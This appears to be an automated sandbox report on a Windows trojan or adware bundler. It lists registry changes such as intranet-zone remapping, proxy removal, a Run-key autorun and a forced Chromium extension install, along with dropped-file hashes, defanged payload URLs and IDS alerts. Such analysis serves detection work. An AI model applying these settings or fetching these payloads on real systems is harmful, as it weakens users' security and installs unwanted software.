[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 27 F1 88 0E E1 75 18 33 F1 61 EB 6C 2F 8C 6C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsr1A.tmp:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 94 7D 8D DD B7 45 67 F5 A0 16 99 EB A9 8A C7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nst16.tmp:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 5F F4 C3 D1 3D 20 02 09 11 EB 20 ED 21 F9 AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsw7.tmp:1224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 8B 40 2E BA BA 89 2F 39 61 50 03 36 01 DD 79"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-tot-mdh-lvs-ppt-opw-jot-crr"

The process nsn24.tmp:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Setup3.exe" = "baidu Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 F8 10 64 69 5D 7A C5 76 47 62 07 CB 12 CB A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process setup3.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 01 3C 9B AC CA EA 5D 94 CA E5 B2 F5 8C 9F 05"

The process nsoB.tmp:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F8 D3 59 A7 F6 6C A4 6E F7 B5 F6 2A 37 1F 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process adv_128.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 1F 37 31 23 99 9D 0E 3A 97 E2 F4 64 72 1C 3D"

[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"

[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"

The process setup3.tmp:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 BB 33 3D 28 F3 1B E8 6D 54 26 0D 95 44 D7 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"bind.exe" = "Bind"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"

Dropped PE files

MD5 File path
a85df53ac3cdc0b948809c73b39b0571 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg18.exe
3eff59fc48dd082035f2c09e2d45b0f8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh1D.tmp
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\inetc.dll
d70820984ba4484885bf5c56ae44c4ec c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskE.tmp
a66865416d1330f1c571c12f4f8c2fea c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1A.tmp
29bf30427bc3544fab563d0d7d36f05d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst16.tmp
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst20.tmp\registry.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst22.tmp\registry.dll
a66865416d1330f1c571c12f4f8c2fea c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe
29bf30427bc3544fab563d0d7d36f05d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe
3eff59fc48dd082035f2c09e2d45b0f8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe
dd326cafa8f8dfb20c5183a1cc3daab6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe
900c797ab605bac6ba0de7e9aba3e7d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe
a85df53ac3cdc0b948809c73b39b0571 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 2125824 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 2273280 2528 2560 3.12379 6c32aa39199a42052d5b9d646394f08c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 4
3cc57d62125a365e0ff6201b70287906
c5acb017c8a1c1610092143cfe7c575f
446f59bd241950572e32cdc0b91875f6
75575eb58aab24025966cd48526b2a5d

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 54.225.185.107
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.189.17
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe 54.230.14.162
hxxp://livestatscounter.com/SysInfo/validator/timer.php 95.211.189.17
hxxp://djapp.info/?file=bundle&v=2
hxxp://d2fpsq9kg43yka.cloudfront.net/prepreinstaller_win.exe 54.230.14.162
hxxp://d2fpsq9kg43yka.cloudfront.net/SilentInstaller_dotnet4.exe 54.230.14.162
hxxp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg=
hxxp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0
hxxp://d2u4zym7ey0920.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe 54.230.14.73
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://json.agewftkv.comhxxp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe 54.230.14.42
hxxp://d2u4zym7ey0920.cloudfront.net/prepreinstaller_win.exe 54.230.14.73
hxxp://www.downloadsoup.com/thankyou.php 54.225.134.66
hxxp://www.djapp.info/?file=bundle&v=2 52.1.45.42
hxxp://events.agewftkv.comhxxp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg=
hxxp://d2u4zym7ey0920.cloudfront.net/SilentInstaller_dotnet4.exe 54.230.14.73
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe 205.185.216.42
d20ssor9owizgr.cloudfront.net 54.230.14.201
d24u51ac8ybaqu.cloudfront.net 54.230.14.81
s3.amazonaws.com 54.231.15.24


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY Executable served from Amazon S3
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

